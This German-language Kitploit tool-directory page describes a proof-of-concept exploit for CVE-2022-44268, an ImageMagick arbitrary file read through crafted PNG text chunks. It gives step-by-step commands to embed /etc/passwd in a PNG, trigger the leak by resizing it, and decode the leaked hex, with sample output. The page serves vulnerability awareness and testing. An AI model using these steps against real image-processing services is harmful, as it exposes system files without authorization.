Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-44268 — Proof-of-Concept-Exploit für die Arbitrary-File-Read-Schwachstelle in ImageMagick (CVE-2022-44268) über manipulierte PNG-Textblöcke, die das Extrahieren von Systemdateien während Bildgrößenänderungen ermöglichen. | Kitploit
Tools/GitHubGitHub/entr0pie/cve-2022-44268
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFLernen & Bildung
GitHubentr0pie/cve-2022-44268

CVE-2022-44268

Proof-of-Concept-Exploit für die Arbitrary-File-Read-Schwachstelle in ImageMagick (CVE-2022-44268) über manipulierte PNG-Textblöcke, die das Extrahieren von Systemdateien während Bildgrößenänderungen ermöglichen.

Repository anzeigen
13144vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-44268

Dieses Repository enthält einen Proof of Concept (POC) für eine Sicherheitslücke in ImageMagick (v. 7.1.0-49), einer weit verbreiteten Open-Source-Bibliothek zur Bildbearbeitung. Die Sicherheitslücke ermöglicht es einem Angreifer, den Inhalt einer beliebigen Datei in ein skaliertes Bild einzubetten, wenn ImageMagick eine PNG-Datei analysiert.

Beschreibung

Wenn ImageMagick Operationen wie das Skalieren einer PNG-Datei durchführt, kann es den Inhalt einer Systemdatei einfügen, sofern das magick-Binärprogramm über die erforderlichen Berechtigungen zum Lesen verfügt. Diese Sicherheitslücke entsteht durch die fehlerhafte Verarbeitung von Textblöcken in PNG-Dateien.

Ein Angreifer kann diese Sicherheitslücke ausnutzen, indem er eine PNG-Datei erstellt oder eine vorhandene verwendet und einen Textblocktyp (tEXt) hinzufügt. Diese Blöcke bestehen aus einem Schlüsselwort und einer Textzeichenfolge. In diesem Fall, wenn das Schlüsselwort mit der Zeichenfolge "profile" (ohne Anführungszeichen) übereinstimmt, interpretiert ImageMagick die zugehörige Textzeichenfolge als Dateinamen und versucht, deren Inhalt als Rohprofil zu laden. Infolgedessen enthält das heruntergeladene skalierte Bild den Inhalt der vom Angreifer angegebenen entfernten Datei.

Weitere Informationen finden Sie in diesem Artikel von MetabaseQ.

Proof of Concept

Um ImageMagick auszunutzen, generieren Sie eine bösartige PNG-Datei:

root@kitploit:~
python3 CVE-2022-44268.py /etc/passwd  # Create output.png

Führen Sie dann einen Skalierungsvorgang mit convert aus:

root@kitploit:~
convert output.png -resize 50% leak.png

Überprüfen Sie schließlich das Leck-Bild und konvertieren Sie das Raw profile in Hexadezimal:

root@kitploit:~
identify -verbose leak.png
# ...
Raw profile type:

    2367
726f6f743a783a303a303a726f6f743a2f726f6f743a2f6269 [...]
root@kitploit:~
python -c "print(bytes.fromhex('726f6f743a783a303a303a726f6f743a2f726f6f743a2f6269 [...]'))"

Hinweis: Dieser POC dient ausschließlich zu Bildungs- und Informationszwecken. Bitte stellen Sie sicher, dass Sie die erforderlichen Berechtigungen und die rechtliche Genehmigung haben, bevor Sie diesen POC auf einem System testen oder verwenden.

Tool herunterladen